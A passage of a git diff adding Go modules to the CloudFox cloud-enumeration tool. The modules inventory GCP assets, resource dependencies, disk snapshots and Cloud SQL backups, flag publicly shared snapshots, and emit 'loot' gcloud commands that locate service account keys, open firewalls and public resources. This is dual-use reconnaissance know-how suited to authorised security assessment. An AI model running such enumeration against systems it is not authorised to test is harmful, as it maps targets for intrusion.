m.TypeCounts { + countMap[c.AssetType] = c.Count + } + for _, c := range counts { + countMap[c.AssetType] += c.Count + } + + m.TypeCounts = []assetservice.AssetTypeCount{} + for assetType, count := range countMap { + m.TypeCounts = append(m.TypeCounts, assetservice.AssetTypeCount{ + AssetType: assetType, + Count: count, + }) + } + m.mu.Unlock() +} + +// processProjectsDependencies analyzes assets with full dependency tracking +func (m *AssetInventoryModule) processProjectsDependencies(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing assets and dependencies...", globals.GCP_ASSET_INVENTORY_MODULE_NAME) + + assetClient, err := asset.NewClient(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Cloud Asset client: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + return + } + defer assetClient.Close() + + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProjectWithDependencies(ctx, project, assetClient, logger) + }(projectID) + } + wg.Wait() + + // Analyze cross-project dependencies + m.analyzeCrossProjectResources() + + // Generate query templates + m.generateQueryTemplates() +} + +func (m *AssetInventoryModule) processProjectWithDependencies(ctx context.Context, projectID string, assetClient *asset.Client, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing dependencies in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + parent := fmt.Sprintf("projects/%s", projectID) + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + PageSize: 500, + } + + it := assetClient.ListAssets(ctx, req) + + for { + assetItem, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets in project %s", projectID)) + break + } + + // Convert to AssetInfo for consistency + assetInfo := assetservice.AssetInfo{ + Name: assetItem.Name, + AssetType: assetItem.AssetType, + ProjectID: projectID, + } + + if assetItem.Resource != nil { + assetInfo.Location = assetItem.Resource.Location + } + + m.mu.Lock() + m.Assets = append(m.Assets, assetInfo) + m.mu.Unlock() + + // Analyze dependencies + m.analyzeAssetDependencies(assetItem, projectID) + } +} + +func (m *AssetInventoryModule) analyzeAssetDependencies(assetItem *assetpb.Asset, projectID string) { + if assetItem.Resource == nil || assetItem.Resource.Data == nil { + return + } + + // Common dependency patterns + dependencyFields := map[string]string{ + "network": "uses", + "subnetwork": "uses", + "serviceAccount": "uses", + "disk": "uses", + "snapshot": "references", + "image": "references", + "keyRing": "uses", + "cryptoKey": "uses", + "topic": "references", + "subscription": "references", + "bucket": "uses", + "dataset": "references", + "cluster": "contains", + } + + for field, depType := range dependencyFields { + if value, ok := assetItem.Resource.Data.Fields[field]; ok { + targetResource := value.GetStringValue() + if targetResource != "" { + dependency := ResourceDependency{ + SourceResource: assetItem.Name, + SourceType: assetItem.AssetType, + TargetResource: targetResource, + TargetType: m.inferResourceType(field), + DependencyType: depType, + ProjectID: projectID, + } + + m.mu.Lock() + m.Dependencies = append(m.Dependencies, dependency) + m.mu.Unlock() + } + } + } +} + +func (m *AssetInventoryModule) inferResourceType(fieldName string) string { + typeMap := map[string]string{ + "network": "compute.googleapis.com/Network", + "subnetwork": "compute.googleapis.com/Subnetwork", + "serviceAccount": "iam.googleapis.com/ServiceAccount", + "disk": "compute.googleapis.com/Disk", + "snapshot": "compute.googleapis.com/Snapshot", + "image": "compute.googleapis.com/Image", + "keyRing": "cloudkms.googleapis.com/KeyRing", + "cryptoKey": "cloudkms.googleapis.com/CryptoKey", + "topic": "pubsub.googleapis.com/Topic", + "subscription": "pubsub.googleapis.com/Subscription", + "bucket": "storage.googleapis.com/Bucket", + "dataset": "bigquery.googleapis.com/Dataset", + "cluster": "container.googleapis.com/Cluster", + } + + if assetType, ok := typeMap[fieldName]; ok { + return assetType + } + return "unknown" +} + +func (m *AssetInventoryModule) analyzeCrossProjectResources() { + m.mu.Lock() + defer m.mu.Unlock() + + targetToSources := make(map[string][]string) + targetToType := make(map[string]string) + + for _, dep := range m.Dependencies { + targetProject := m.extractProjectFromResource(dep.TargetResource) + if targetProject != "" && targetProject != dep.ProjectID { + targetToSources[dep.TargetResource] = append(targetToSources[dep.TargetResource], dep.ProjectID) + targetToType[dep.TargetResource] = dep.TargetType + } + } + + for target, sources := range targetToSources { + crossProject := CrossProjectResource{ + ResourceName: target, + ResourceType: targetToType[target], + OwnerProject: m.extractProjectFromResource(target), + AccessedFrom: sources, + } + + m.CrossProject = append(m.CrossProject, crossProject) + } +} + +func (m *AssetInventoryModule) extractProjectFromResource(resource string) string { + if strings.Contains(resource, "projects/") { + parts := strings.Split(resource, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *AssetInventoryModule) extractResourceName(resource string) string { + parts := strings.Split(resource, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return resource +} + +func (m *AssetInventoryModule) generateQueryTemplates() { + templates := []struct { + Name string + Description string + Query string + }{ + {"Public Storage Buckets", "Find all public GCS buckets", `resource.type="storage.googleapis.com/Bucket" AND resource.data.iamConfiguration.uniformBucketLevelAccess.enabled=false`}, + {"VMs with External IPs", "Find compute instances with external IP addresses", `resource.type="compute.googleapis.com/Instance" AND resource.data.networkInterfaces.accessConfigs:*`}, + {"Service Account Keys", "Find all user-managed service account keys", `resource.type="iam.googleapis.com/ServiceAccountKey" AND resource.data.keyType="USER_MANAGED"`}, + {"Firewall Rules - Open to Internet", "Find firewall rules allowing 0.0.0.0/0", `resource.type="compute.googleapis.com/Firewall" AND resource.data.sourceRanges:"0.0.0.0/0"`}, + {"Cloud SQL - Public IPs", "Find Cloud SQL instances with public IP", `resource.type="sqladmin.googleapis.com/Instance" AND resource.data.settings.ipConfiguration.ipv4Enabled=true`}, + {"Unencrypted Disks", "Find disks without customer-managed encryption", `resource.type="compute.googleapis.com/Disk" AND NOT resource.data.diskEncryptionKey:*`}, + {"GKE Clusters - Legacy Auth", "Find GKE clusters with legacy authentication", `resource.type="container.googleapis.com/Cluster" AND resource.data.legacyAbac.enabled=true`}, + } + + for _, t := range templates { + m.LootMap["asset-inventory-commands"].Contents += fmt.Sprintf( + "# %s - %s\ngcloud asset search-all-resources --scope=projects/PROJECT_ID --query='%s'\n\n", + t.Name, t.Description, t.Query, + ) + } + + // Add export commands + m.LootMap["asset-inventory-commands"].Contents += "# Export complete asset inventory\n" + for _, projectID := range m.ProjectIDs { + m.LootMap["asset-inventory-commands"].Contents += fmt.Sprintf( + "gcloud asset export --project=%s --content-type=resource --output-path=gs://BUCKET_NAME/%s-assets.json\n", + projectID, projectID, + ) + } +} + +func (m *AssetInventoryModule) initializeLootFiles() { + m.LootMap["asset-inventory-details"] = &internal.LootFile{ + Name: "asset-inventory-details", + Contents: "# Cloud Asset Inventory Details\n# Generated by CloudFox\n\n", + } + m.LootMap["asset-inventory-commands"] = &internal.LootFile{ + Name: "asset-inventory-commands", + Contents: "# Cloud Asset Inventory Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *AssetInventoryModule) addToLoot(asset assetservice.AssetInfo) { + m.LootMap["asset-inventory-details"].Contents += fmt.Sprintf( + "# Asset: %s\n# Type: %s\n# Project: %s\n# Location: %s\n", + asset.Name, asset.AssetType, asset.ProjectID, asset.Location) + + if asset.PublicAccess { + m.LootMap["asset-inventory-details"].Contents += "# Public Access: Yes\n" + } + m.LootMap["asset-inventory-details"].Contents += "\n" +} + +func (m *AssetInventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Asset counts table (if we have counts) + if len(m.TypeCounts) > 0 { + // Sort by count descending + sort.Slice(m.TypeCounts, func(i, j int) bool { + return m.TypeCounts[i].Count > m.TypeCounts[j].Count + }) + + header := []string{"Asset Type", "Count"} + var body [][]string + for _, tc := range m.TypeCounts { + body = append(body, []string{ + tc.AssetType, + fmt.Sprintf("%d", tc.Count), + }) + } + tables = append(tables, internal.TableFile{ + Name: "asset-counts", + Header: header, + Body: body, + }) + } + + // Assets table (if we have assets) + if len(m.Assets) > 0 { + if checkIAM { + // When checking IAM, show one row per IAM binding member + header := []string{"Project ID", "Project Name", "Name", "Asset Type", "Location", "Role", "Member", "Public"} + + var body [][]string + for _, asset := range m.Assets { + publicAccess := "No" + if asset.PublicAccess { + publicAccess = "Yes" + } + + // If no IAM bindings, still show the asset + if len(asset.IAMBindings) == 0 { + body = append(body, []string{ + asset.ProjectID, + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range asset.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + asset.ProjectID, + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + tables = append(tables, internal.TableFile{ + Name: "assets", + Header: header, + Body: body, + }) + + // Public assets table + var publicBody [][]string + for _, asset := range m.Assets { + if asset.PublicAccess { + for _, binding := range asset.IAMBindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + publicBody = append(publicBody, []string{ + asset.ProjectID, + m.GetProjectName(asset.ProjectID), + asset.Name, + asset.AssetType, + binding.Role, + member, + }) + } + } + } + } + } + + if len(publicBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "public-assets", + Header: []string{"Project ID", "Project Name", "Name", "Asset Type", "Role", "Member"}, + Body: publicBody, + }) + } + } else { + // Basic listing without IAM + header := []string{"Project ID", "Project Name", "Name", "Asset Type", "Location"} + var body [][]string + for _, asset := range m.Assets { + body = append(body, []string{ + asset.ProjectID, + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + }) + } + tables = append(tables, internal.TableFile{ + Name: "assets", + Header: header, + Body: body, + }) + } + } + + // Dependencies table (if we have dependencies) + if len(m.Dependencies) > 0 { + depsHeader := []string{"Project ID", "Project Name", "Source", "Dependency Type", "Target", "Target Type"} + var depsBody [][]string + for _, d := range m.Dependencies { + depsBody = append(depsBody, []string{ + d.ProjectID, + m.GetProjectName(d.ProjectID), + m.extractResourceName(d.SourceResource), + d.DependencyType, + m.extractResourceName(d.TargetResource), + assetservice.ExtractAssetTypeShort(d.TargetType), + }) + + // Add to loot + m.LootMap["asset-inventory-details"].Contents += fmt.Sprintf( + "# Dependency: %s -> %s (%s)\n", + m.extractResourceName(d.SourceResource), + m.extractResourceName(d.TargetResource), + d.DependencyType, + ) + } + tables = append(tables, internal.TableFile{ + Name: "asset-dependencies", + Header: depsHeader, + Body: depsBody, + }) + } + + // Cross-project resources table (if we have cross-project resources) + if len(m.CrossProject) > 0 { + crossHeader := []string{"Resource", "Type", "Owner Project", "Accessed From"} + var crossBody [][]string + for _, c := range m.CrossProject { + crossBody = append(crossBody, []string{ + m.extractResourceName(c.ResourceName), + assetservice.ExtractAssetTypeShort(c.ResourceType), + c.OwnerProject, + strings.Join(c.AccessedFrom, ", "), + }) + } + tables = append(tables, internal.TableFile{ + Name: "cross-project-resources", + Header: crossHeader, + Body: crossBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := AssetInventoryOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } +} diff --git a/gcp/commands/backupinventory.go b/gcp/commands/backupinventory.go new file mode 100644 index 00000000..09d5a602 --- /dev/null +++ b/gcp/commands/backupinventory.go @@ -0,0 +1,743 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/compute/v1" + "google.golang.org/api/sqladmin/v1beta4" +) + +// Module name constant +const GCP_BACKUPINVENTORY_MODULE_NAME string = "backup-inventory" + +var GCPBackupInventoryCommand = &cobra.Command{ + Use: GCP_BACKUPINVENTORY_MODULE_NAME, + Aliases: []string{"backups", "backup", "snapshots", "dr"}, + Short: "Enumerate backup policies, protected resources, and identify backup gaps", + Long: `Inventory backup and disaster recovery configurations across GCP resources. + +Features: +- Compute Engine disk snapshots and snapshot schedules +- Cloud SQL automated backups and point-in-time recovery +- Identifies unprotected resources (no backup coverage) +- Analyzes backup retention policies +- Checks for stale or failing backups`, + Run: runGCPBackupInventoryCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type BackupResource struct { + ProjectID string + Name string + ResourceType string // compute-disk, cloudsql-instance + Location string + SizeGB int64 + Protected bool + BackupType string // snapshot, automated, none + Schedule string + RetentionDays int + LastBackup string + BackupCount int + BackupStatus string + PITREnabled bool + BackupLocation string +} + +type IAMBinding struct { + Role string + Members []string +} + +type ComputeSnapshot struct { + ProjectID string + Name string + SourceDisk string + Status string + DiskSizeGB int64 + StorageBytes int64 + CreationTime string + StorageLocats []string + AutoCreated bool + SnapshotType string + IAMBindings []IAMBinding + PublicAccess bool +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type BackupInventoryModule struct { + gcpinternal.BaseGCPModule + + Resources []BackupResource + Snapshots []ComputeSnapshot + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Tracking maps + disksWithBackups map[string]bool + sqlWithBackups map[string]bool + allDisks map[string]diskInfo + allSQLInstances map[string]sqlInstanceInfo +} + +type diskInfo struct { + SizeGB int64 + Zone string + ProjectID string + Name string +} + +type sqlInstanceInfo struct { + ProjectID string + Region string +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type BackupInventoryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BackupInventoryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BackupInventoryOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPBackupInventoryCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_BACKUPINVENTORY_MODULE_NAME) + if err != nil { + return + } + + module := &BackupInventoryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Resources: []BackupResource{}, + Snapshots: []ComputeSnapshot{}, + LootMap: make(map[string]*internal.LootFile), + disksWithBackups: make(map[string]bool), + sqlWithBackups: make(map[string]bool), + allDisks: make(map[string]diskInfo), + allSQLInstances: make(map[string]sqlInstanceInfo), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *BackupInventoryModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Inventorying backup configurations...", GCP_BACKUPINVENTORY_MODULE_NAME) + + computeService, err := compute.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + return + } + + sqlService, err := sqladmin.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create SQL Admin service: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + } + } + + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, computeService, sqlService, logger) + }(projectID) + } + wg.Wait() + + // Identify unprotected resources + m.identifyUnprotectedResources() + + if len(m.Resources) == 0 && len(m.Snapshots) == 0 { + logger.InfoM("No backup data found", GCP_BACKUPINVENTORY_MODULE_NAME) + return + } + + // Count protected vs unprotected + protectedCount := 0 + unprotectedCount := 0 + for _, r := range m.Resources { + if r.Protected { + protectedCount++ + } else { + unprotectedCount++ + } + } + + // Count public snapshots + publicSnapshotCount := 0 + for _, s := range m.Snapshots { + if s.PublicAccess { + publicSnapshotCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d resource(s): %d protected, %d unprotected, %d snapshot(s)", + len(m.Resources), protectedCount, unprotectedCount, len(m.Snapshots)), GCP_BACKUPINVENTORY_MODULE_NAME) + + if unprotectedCount > 0 { + logger.InfoM(fmt.Sprintf("Found %d resource(s) without backup coverage", unprotectedCount), GCP_BACKUPINVENTORY_MODULE_NAME) + } + + if publicSnapshotCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible snapshot(s)!", publicSnapshotCount), GCP_BACKUPINVENTORY_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *BackupInventoryModule) processProject(ctx context.Context, projectID string, computeService *compute.Service, sqlService *sqladmin.Service, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating backups for project: %s", projectID), GCP_BACKUPINVENTORY_MODULE_NAME) + } + + // List all disks first (for gap analysis) + m.enumerateDisks(ctx, projectID, computeService, logger) + + // List snapshots + m.enumerateSnapshots(ctx, projectID, computeService, logger) + + // List SQL instances and backups + if sqlService != nil { + m.enumerateSQLBackups(ctx, projectID, sqlService, logger) + } +} + +func (m *BackupInventoryModule) enumerateDisks(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Disks.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.DiskAggregatedList) error { + for zone, diskList := range page.Items { + if diskList.Disks == nil { + continue + } + for _, disk := range diskList.Disks { + m.mu.Lock() + m.allDisks[disk.SelfLink] = diskInfo{ + SizeGB: disk.SizeGb, + Zone: m.extractZoneFromURL(zone), + ProjectID: projectID, + Name: disk.Name, + } + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate disks in project %s", projectID)) + } +} + +func (m *BackupInventoryModule) enumerateSnapshots(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Snapshots.List(projectID) + err := req.Pages(ctx, func(page *compute.SnapshotList) error { + for _, snapshot := range page.Items { + snap := ComputeSnapshot{ + ProjectID: projectID, + Name: snapshot.Name, + SourceDisk: snapshot.SourceDisk, + Status: snapshot.Status, + DiskSizeGB: snapshot.DiskSizeGb, + StorageBytes: snapshot.StorageBytes, + CreationTime: snapshot.CreationTimestamp, + StorageLocats: snapshot.StorageLocations, + AutoCreated: snapshot.AutoCreated, + SnapshotType: snapshot.SnapshotType, + } + + // Get IAM policy for this snapshot + iamPolicy, iamErr := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Context(ctx).Do() + if iamErr == nil && iamPolicy != nil { + for _, binding := range iamPolicy.Bindings { + snap.IAMBindings = append(snap.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + snap.PublicAccess = true + } + } + } + } + + m.mu.Lock() + m.Snapshots = append(m.Snapshots, snap) + m.disksWithBackups[snapshot.SourceDisk] = true + m.mu.Unlock() + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate snapshots in project %s", projectID)) + } + + // Track protected resources from snapshots + m.trackSnapshotProtection(projectID) +} + +func (m *BackupInventoryModule) trackSnapshotProtection(projectID string) { + // Group snapshots by source disk + diskSnapshots := make(map[string][]ComputeSnapshot) + for _, snap := range m.Snapshots { + if snap.ProjectID == projectID { + diskSnapshots[snap.SourceDisk] = append(diskSnapshots[snap.SourceDisk], snap) + } + } + + m.mu.Lock() + defer m.mu.Unlock() + + for diskURL, snaps := range diskSnapshots { + // Find latest snapshot + var latestTime time.Time + var latestSnap ComputeSnapshot + for _, snap := range snaps { + t, err := time.Parse(time.RFC3339, snap.CreationTime) + if err == nil && t.After(latestTime) { + latestTime = t + latestSnap = snap + } + } + + diskInfo := m.allDisks[diskURL] + backupStatus := latestSnap.Status + + // Calculate age of last backup + if !latestTime.IsZero() { + age := time.Since(latestTime) + if age > 7*24*time.Hour { + backupStatus = "STALE" + } else { + backupStatus = "CURRENT" + } + } + + resource := BackupResource{ + ProjectID: projectID, + Name: m.extractDiskName(diskURL), + ResourceType: "compute-disk", + Location: diskInfo.Zone, + SizeGB: diskInfo.SizeGB, + Protected: true, + BackupType: "snapshot", + LastBackup: latestSnap.CreationTime, + BackupCount: len(snaps), + BackupStatus: backupStatus, + BackupLocation: strings.Join(latestSnap.StorageLocats, ","), + } + + m.Resources = append(m.Resources, resource) + } +} + +func (m *BackupInventoryModule) enumerateSQLBackups(ctx context.Context, projectID string, sqlService *sqladmin.Service, logger internal.Logger) { + instances, err := sqlService.Instances.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate SQL instances in project %s", projectID)) + return + } + + for _, instance := range instances.Items { + m.mu.Lock() + m.allSQLInstances[instance.Name] = sqlInstanceInfo{ + ProjectID: projectID, + Region: instance.Region, + } + m.mu.Unlock() + + // Check backup configuration + backupEnabled := false + pitrEnabled := false + var retentionDays int + var backupStartTime string + + if instance.Settings != nil && instance.Settings.BackupConfiguration != nil { + backupEnabled = instance.Settings.BackupConfiguration.Enabled + pitrEnabled = instance.Settings.BackupConfiguration.PointInTimeRecoveryEnabled + retentionDays = int(instance.Settings.BackupConfiguration.TransactionLogRetentionDays) + backupStartTime = instance.Settings.BackupConfiguration.StartTime + } + + if backupEnabled { + m.mu.Lock() + m.sqlWithBackups[instance.Name] = true + m.mu.Unlock() + + // List actual backups for this instance + backups, err := sqlService.BackupRuns.List(projectID, instance.Name).Do() + if err != nil { + continue + } + + var latestBackupTime string + var latestStatus string + var latestLocation string + backupCount := 0 + + for _, backup := range backups.Items { + backupCount++ + if latestBackupTime == "" || backup.StartTime > latestBackupTime { + latestBackupTime = backup.StartTime + latestStatus = backup.Status + latestLocation = backup.Location + } + } + + resource := BackupResource{ + ProjectID: projectID, + Name: instance.Name, + ResourceType: "cloudsql-instance", + Location: instance.Region, + Protected: true, + BackupType: "automated", + Schedule: fmt.Sprintf("Daily at %s", backupStartTime), + RetentionDays: retentionDays, + LastBackup: latestBackupTime, + BackupCount: backupCount, + BackupStatus: latestStatus, + PITREnabled: pitrEnabled, + BackupLocation: latestLocation, + } + + m.mu.Lock() + m.Resources = append(m.Resources, resource) + m.mu.Unlock() + } + } +} + +// ------------------------------ +// Gap Analysis +// ------------------------------ +func (m *BackupInventoryModule) identifyUnprotectedResources() { + m.mu.Lock() + defer m.mu.Unlock() + + // Find disks without snapshots + for diskURL, info := range m.allDisks { + if !m.disksWithBackups[diskURL] { + resource := BackupResource{ + ProjectID: info.ProjectID, + Name: info.Name, + ResourceType: "compute-disk", + Location: info.Zone, + SizeGB: info.SizeGB, + Protected: false, + BackupType: "none", + } + + m.Resources = append(m.Resources, resource) + + // Add to loot + m.LootMap["backup-inventory-commands"].Contents += fmt.Sprintf( + "# Unprotected disk: %s (%s) - %dGB\n"+ + "gcloud compute resource-policies create snapshot-schedule %s-backup \\\n"+ + " --project=%s \\\n"+ + " --region=%s \\\n"+ + " --max-retention-days=30 \\\n"+ + " --daily-schedule\n\n", + info.Name, info.ProjectID, info.SizeGB, + info.Name, info.ProjectID, m.extractRegionFromZone(info.Zone), + ) + } + } + + // Find SQL instances without backups + for instanceName, info := range m.allSQLInstances { + if !m.sqlWithBackups[instanceName] { + resource := BackupResource{ + ProjectID: info.ProjectID, + Name: instanceName, + ResourceType: "cloudsql-instance", + Location: info.Region, + Protected: false, + BackupType: "none", + } + + m.Resources = append(m.Resources, resource) + + // Add to loot + m.LootMap["backup-inventory-commands"].Contents += fmt.Sprintf( + "# Unprotected SQL instance: %s\n"+ + "gcloud sql instances patch %s \\\n"+ + " --backup-start-time=02:00 \\\n"+ + " --enable-bin-log\n\n", + instanceName, instanceName, + ) + } + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *BackupInventoryModule) extractDiskName(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func (m *BackupInventoryModule) extractZoneFromURL(url string) string { + if strings.Contains(url, "zones/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "zones" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *BackupInventoryModule) extractRegionFromZone(zone string) string { + if zone == "" { + return "" + } + // Zone format: us-central1-a -> Region: us-central1 + parts := strings.Split(zone, "-") + if len(parts) >= 2 { + return strings.Join(parts[:len(parts)-1], "-") + } + return zone +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *BackupInventoryModule) initializeLootFiles() { + m.LootMap["backup-inventory-commands"] = &internal.LootFile{ + Name: "backup-inventory-commands", + Contents: "# Backup Inventory Commands\n" + + "# Generated by CloudFox\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Main backup inventory table (all resources) + if len(m.Resources) > 0 { + header := []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Location", + "Size (GB)", + "Protected", + "Backup Type", + "Schedule", + "Retention", + "Last Backup", + "Count", + "Status", + "PITR", + } + + var body [][]string + for _, r := range m.Resources { + protectedStr := "No" + if r.Protected { + protectedStr = "Yes" + } + + pitrStr := "No" + if r.PITREnabled { + pitrStr = "Yes" + } + + retentionStr := "" + if r.RetentionDays > 0 { + retentionStr = fmt.Sprintf("%d days", r.RetentionDays) + } + + sizeStr := "" + if r.SizeGB > 0 { + sizeStr = fmt.Sprintf("%d", r.SizeGB) + } + + countStr := "" + if r.BackupCount > 0 { + countStr = fmt.Sprintf("%d", r.BackupCount) + } + + body = append(body, []string{ + r.ProjectID, + m.GetProjectName(r.ProjectID), + r.Name, + r.ResourceType, + r.Location, + sizeStr, + protectedStr, + r.BackupType, + r.Schedule, + retentionStr, + r.LastBackup, + countStr, + r.BackupStatus, + pitrStr, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "backup-inventory", + Header: header, + Body: body, + }) + } + + // Snapshots table (one row per IAM binding member) + if len(m.Snapshots) > 0 { + header := []string{ + "Project ID", + "Project Name", + "Snapshot", + "Source Disk", + "Size (GB)", + "Created", + "Status", + "Type", + "Auto Created", + "Locations", + "Role", + "Member", + "Public", + } + + var body [][]string + for _, s := range m.Snapshots { + autoCreatedStr := "No" + if s.AutoCreated { + autoCreatedStr = "Yes" + } + + publicAccess := "No" + if s.PublicAccess { + publicAccess = "Yes" + } + + // If no IAM bindings, still show the snapshot + if len(s.IAMBindings) == 0 { + body = append(body, []string{ + s.ProjectID, + m.GetProjectName(s.ProjectID), + s.Name, + m.extractDiskName(s.SourceDisk), + fmt.Sprintf("%d", s.DiskSizeGB), + s.CreationTime, + s.Status, + s.SnapshotType, + autoCreatedStr, + strings.Join(s.StorageLocats, ","), + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range s.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + s.ProjectID, + m.GetProjectName(s.ProjectID), + s.Name, + m.extractDiskName(s.SourceDisk), + fmt.Sprintf("%d", s.DiskSizeGB), + s.CreationTime, + s.Status, + s.SnapshotType, + autoCreatedStr, + strings.Join(s.StorageLocats, ","), + binding.Role, + member, + publicAccess, + }) + } + } + } + } + + tables = append(tables, internal.TableFile{ + Name: "backup-snapshots", + Header: header, + Body: body, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := BackupInventoryOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/beyondcorp.go b/gcp/commands/beyondcorp.go new file mode 100644 index 00000000..3741a5e6 --- /dev/null +++ b/gcp/commands/beyondcorp.go @@ -0,0 +1,262 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + beyondcorpservice "github.com/BishopFox/cloudfox/gcp/services/beyondcorpService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + 